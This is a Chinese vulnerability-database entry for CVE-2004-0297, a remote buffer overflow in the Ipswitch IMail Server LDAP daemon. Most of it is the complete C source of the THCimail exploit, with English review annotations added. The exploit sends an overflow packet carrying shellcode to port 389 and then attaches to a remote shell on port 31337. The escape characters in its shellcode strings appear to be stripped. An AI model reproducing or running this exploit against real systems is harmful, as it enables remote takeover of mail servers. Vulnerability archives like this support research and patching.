Ipswitch IMail Server LDAP守护进程远程缓冲区溢出漏洞

Ipswitch IMail Server LDAP守护进程远程缓冲区溢出漏洞

漏洞ID 1107756 漏洞类型 未知
发布时间 2004-02-27 更新时间 2005-05-13
CVE编号 CVE-2004-0297
CNNVD-ID CNNVD-200411-149
漏洞平台 Windows CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/157
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200411-149
|漏洞详情
Ipswitch IMail Server 是一款基于 WEB 的邮件解决方案。Ipswitch LDAP 守护进程不充分检查用户提供的 LDAP 标记，远程攻击者可以利用这个漏洞进行缓冲区溢出攻击，可能以 LDAP 守护进程的进程权限在系统上执行任意指令。LDAP 消息由包含标记的长度和内容组成，例如标记 0x02 0x03 0x0A 0x25 0xBD 代表整数 665,501 (0xA25BD)。如果攻击者提供的长度标记过长，程序根据标记长度拷贝用户提供的数据时缺少充分的边界检查，可因如下汇编指令而覆盖堆栈中的内存：.text:00401188 mov byte ptr [ebp+ecx+var_4], dl。精心构造拷贝数据可能以 LDAP 守护进程的进程权限在系统上执行任意指令。
|漏洞EXP
/********************************************************/
/* THCimail 0.1 - Wind0wZ remote root exploit                                */
/* Exploit by: Johnny Cyberpunk ([email protected])                     */
/* THC PUBLIC SOURCE MATERIALS                                               */
/*                                                                                              */
/* Bug was found by idefense or some idefense slaves ;)                 */
/* http://www.idefense.com/application/poi/display?id=74&type=vuln */
/*                                                                                              */
/* compile with MS Visual C++ : cl THCimail.c                                  */
/*                                                                                              */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX,    */
/* dvorak, scut, stealth, FtR and Random                                       */
/********************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

/* Four-character strings appended to the request right after `jumper`;
 * main() selects one of them from the OS command-line argument. */
char *WIN2KEN = "xc4x2ax02x75";
char *WIN2KPG = "xc4x2axf9x74";
char *WINXPSP1G = "xfex63xa1x71";

/* Appended to the request immediately after the first filler buffer. */
#define jumper "xebx06x4ax43"

/* Leading bytes of the request: the first string main() copies into the
 * output buffer. */
char ldapshit[] = "x30x82x0ax3dx02x01x01x60x82x01x36x02xffxffxffxffx20";

/* Appended after the OS-specific string and before the second filler. */
char shellcode[] =
"x8bx7cx24xfcx83xc7x21x33xc9xb2x8fx66x81xc1x02"
"x02x8ax1fx32xdax88x1fx47xe2xf7x64xacxf5xe6x8d"
"x8axe3xd6x77x92x13x51x03x5exc3xffx5bx8cx7fxa8"
"xafxafxbfx87xd8xdcxbdxd0xbcxbdxa1xcbxc3xc3x8e"
"x64x8ax67x76x70x70x70xd2x0cx62xa5xe5xbfxd6xeb"
"x04x8ex04xcfx83x04xffx93x22x04xf7x87x02xd0xb3"
"x04x94x8ex74x04xd4xf7x8ex74x04xc4x93x8ex76x04"
"xdcxabx8ex75xdcxdexddx04xd4xafx8ex74xbex46xce"
"xbex4fx16x04xbbx04x8ex71x23xbex4dx5ex6dx0bx4f"
"xfax78x80x39xcax8ax02xcbxcax8bxe9xb6x9fxfax6e"
"xe9xbex9fxd5xd7xd1xd9xdfxddxa4xc1x9fxcex80x38"
"x83xc5x04x8bx07x8ex77x80x39xc2x8ax06xcbx02x57"
"x71xc2x8axfax31x71xc2x8bxfbxaex71xc2xadx02xd2"
"x97xdcx70x5fx06x48xe5x8bxd7x07xcax8ax0fxcaxf8"
"x85x02xd2xfbx0fxe4xa9x9bx66xf7x70x70x70x06x41"
"xbex54xdcxdcxdcxdcxd9xc9xd9x70x5fx18xdaxd7xe9"
"x06xbfxe5x9fxdaxd8x70xdax5bxc1xd9xd8x70xdax43"
"xdcxdaxd8x70xdax5fx18x02xcax07xdfx70xdax6bxda"
"xdax70xdax67x02xcbx8ax83x1bxdcxe7xa1xeaxf7xea"
"xe7xd3xecxe2xebx1bxbex5dx02xcax43x1bxd8xd8xd8"
"xdcxdcx71x49x8ex7dxddx1bx02xcaxf7xdfx02xcax07"
"xdfx3ex87xdcxdcxe5x9fx71x41xddxdcxdcxdcxdax70"
"xdax63xe5x70x70xdax6f";


/* Forward declarations; both are defined below main(). */
void usage();
void shell(int sock);

/*
 * Program entry point.
 *
 * Reads <host> <os> <version> from argv, assembles a 2650-byte request from
 * the file-scope byte strings plus two 'X'-filled filler buffers, connects to
 * TCP port 389 on <host> and sends it, sleeps one second, then connects to
 * port 31337 on the same host and hands that socket to shell().
 * Every failure path calls exit(); the function never returns normally.
 */
int main(int argc, char *argv[])
{ 
    /* NOTE(review): Winsock's socket() returns a SOCKET and reports failure
     * as INVALID_SOCKET rather than 0, so the `!sock` test further down does
     * not detect a failed call. `i` is declared but never used. */
    unsigned int i,sock,sock2,addr,os,ver,rc,IMAILVER;
    unsigned char *finalbuffer,*crapbuf1,*crapbuf2;
    unsigned int IMAIL6_7=60;   /* filler length chosen by version code 0 */
    unsigned int IMAIL_8=68;    /* filler length chosen by version code 1 */

    struct sockaddr_in mytcp;   /* never zeroed: sin_zero stays indeterminate */
    struct hostent * hp;
    WSADATA wsaData;

    printf("nTHCimail v0.1 - Imail LDAP exploitn");
    printf("tested on Imail 6-8n");
    printf("by Johnny Cyberpunk ([email protected])n");

    /* Exactly three arguments are required; usage() exits the process. */
    if(argc<4 || argc>4)
        usage();

    /* atoi() reports no errors: non-numeric text yields 0 and silently
     * selects version code 0 (the same applies to the OS code below). */
    ver = (unsigned short)atoi(argv[3]); 
    switch(ver)
    {
    case 0:
        IMAILVER = IMAIL6_7;
        break;
    case 1:
        IMAILVER = IMAIL_8;
        break;
    default:
        printf("nYou entered an illegal version !nn");
        usage();
        exit(-1);   /* unreachable: usage() already exits */
    }

    /* NOTE(review): none of the three malloc() results is checked, and both
     * filler buffers are filled end to end with 'X' without a NUL terminator,
     * so the strcat() calls below depend on whatever byte happens to follow
     * each allocation to stop reading. */
    crapbuf1 = malloc(IMAILVER);
    memset(crapbuf1,'X',IMAILVER);

    printf("imailver = %dn",IMAILVER);

    crapbuf2 = malloc(2220);
    memset(crapbuf2,'X',2220);

    finalbuffer = malloc(2650);
    memset(finalbuffer,0,2650);   /* zeroed so the first strcat() starts at offset 0 */

    printf("n[*] building buffern");

    /* Request layout, in append order: ldapshit, crapbuf1, jumper,
     * one OS-specific string, shellcode, crapbuf2. */
    strcat(finalbuffer,ldapshit);

    strcat(finalbuffer,crapbuf1);

    strcat(finalbuffer,jumper);

    os = (unsigned short)atoi(argv[2]); 
    switch(os)
    {
    case 0:
        strcat(finalbuffer,WIN2KPG);
        break;
    case 1:
        strcat(finalbuffer,WIN2KPG);
        break;
    case 2:
        strcat(finalbuffer,WINXPSP1G);
        break;
    default:
        printf("nYou entered an illegal OS !nn");
        usage();
        exit(-1);   /* unreachable: usage() already exits */
    }

    strcat(finalbuffer,shellcode);
    strcat(finalbuffer,crapbuf2);

    /* Winsock 2.1 is requested; WSACleanup() is never called on any path. */
    if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
    {
        printf("WSAStartup failed !n");
        exit(-1);
    }

    /* Resolve by name first, then fall back to dotted-quad parsing. `addr` is
     * only read when hp is NULL, i.e. after it has been assigned here. */
    hp = gethostbyname(argv[1]);

    if (!hp){
        addr = inet_addr(argv[1]);
    }
    if ((!hp) && (addr == INADDR_NONE) )
    {
        printf("Unable to resolve %sn",argv[1]);
        exit(-1);
    }

    sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    if (!sock)   /* see NOTE above: INVALID_SOCKET is not 0 */
    { 
        printf("socket() error...n");
        exit(-1);
    }

    if (hp != NULL)
        memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
    else
        mytcp.sin_addr.s_addr = addr;

    if (hp)
        mytcp.sin_family = hp->h_addrtype;
    else
        mytcp.sin_family = AF_INET;

    mytcp.sin_port=htons(389);   /* LDAP */

    printf("[*] connecting the targetn");

    rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
    if(rc==0)
    {
        /* The whole 2650-byte allocation is sent, including any trailing
         * zero bytes; the send() return value is not checked. */
        send(sock,finalbuffer,2650,0);
        printf("[*] Exploit send successfully ! Sleeping a while ....n");
        Sleep(1000);   /* milliseconds */
    }
    else
        printf("nCan't connect to ldap port!n");

    if(rc==0)
    {
        /* Second connection to the same address on port 31337; sock2 is
         * neither checked after socket() nor closed afterwards. */
        printf("[*] Trying to get a shellnn");
        sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
        mytcp.sin_port = htons(31337);
        rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
        if(rc!=0)
        {
            printf("can't connect to port 31337 ;( maybe firewalled ...n");
            exit(-1);
        }
        shell(sock2);   /* returns once either side of the relay ends */
    }

    shutdown(sock,1);   /* how=1 (SD_SEND): stop sending on the first socket */
    closesocket(sock);

    free(crapbuf1);
    free(crapbuf2);
    free(finalbuffer); 

    exit(0);
}

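/*
 * Prints the command-line synopsis and the accepted OS / IMail version codes
 * to stdout, then terminates the process with status 0. Never returns.
 * (The unused local `a` of the original was dropped; the prototype-style
 * `(void)` parameter list matches the file's forward declaration.)
 */
void usage(void)
{
    printf("nUsage: <Host> <OS> <Imail Version>n");
    printf("Sample: THCimail 194.44.55.56 0 1nn");
    printf("OS:n");
    printf("0 - Windows 2000 Server english all service packsn");
    printf("1 - Windows 2000 Professional germann");
    printf("2 - Windows XP SP1 germannn");
    printf("Imail Version:n");
    printf("0 - Imail 6+7n");
    printf("1 - Imail 8n");
    exit(0);
}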

/*
 * Relays data between stdin/stdout and `sock` until either side ends.
 *
 * Each loop iteration polls `sock` for readability with a 1 s timeout. If it
 * is readable, one recv() is copied to fd 1 with write(); otherwise one
 * read() from fd 0 is forwarded with send(). The function returns as soon as
 * any recv/write/read/send returns <= 0.
 *
 * NOTE(review): read() and write() are not declared by any header this file
 * includes (<stdio.h>, <stdlib.h>, <string.h>, <winsock2.h>).
 *
 * @param sock  connected socket (a Winsock SOCKET narrowed to int by the caller)
 */
void shell(int sock)
{
    int l;
    char buf[1024];
    struct timeval time;   /* reused unchanged across select() calls */
    /* Hand-built readfds: ul[0] stands in for fd_count and ul[1] for the
     * single fd_array entry. This presumes Winsock's fd_set layout
     * {u_int fd_count; SOCKET fd_array[];} and that unsigned long has the
     * same size as SOCKET; FD_ZERO/FD_SET would express this portably. */
    unsigned long ul[2];

    time.tv_sec = 1;
    time.tv_usec = 0;

    while (1)
    {
        ul[0] = 1;
        ul[1] = sock;

        /* First argument (nfds) is ignored by Winsock's select(). */
        l = select (0, (fd_set *)&ul, NULL, NULL, &time);
        if(l == 1)
        { 
            /* socket -> stdout */
            l = recv (sock, buf, sizeof (buf), 0);
            if (l <= 0)
            {
                printf ("bye bye...n");
                return;
            }
            l = write (1, buf, l);
            if (l <= 0)
            {
                printf ("bye bye...n");
                return;
            }
        }
        else
        {
            /* timeout or select() error: stdin -> socket (blocks on read) */
            l = read (0, buf, sizeof (buf));
            if (l <= 0)
            {
                printf("bye bye...n");
                return;
            }
            l = send(sock, buf, l, 0);
            if (l <= 0)
            {
                printf("bye bye...n");
                return;
            }
        }
    }
}



// milw0rm.com [2004-02-27]
|参考资料

来源:US-CERTVulnerabilityNote:VU#972334
名称:VU#972334
链接:http://www.kb.cert.org/vuls/id/972334
来源:BID
名称:9682
链接:http://www.securityfocus.com/bid/9682
来源:XF
名称:imail-ldap-tag-bo(15243)
链接:http://xforce.iss.net/xforce/xfdb/15243
来源:www.ipswitch.com
链接:http://www.ipswitch.com/support/imail/releases/imail_professional/im805HF2.html
来源:OSVDB
名称:3984
链接:http://www.osvdb.org/3984
来源:IDEFENSE
名称:20040217IpswitchIMailLDAPDaemonRemoteBufferOverflow
链接:http://www.idefense.com/application/poi/display?id=74
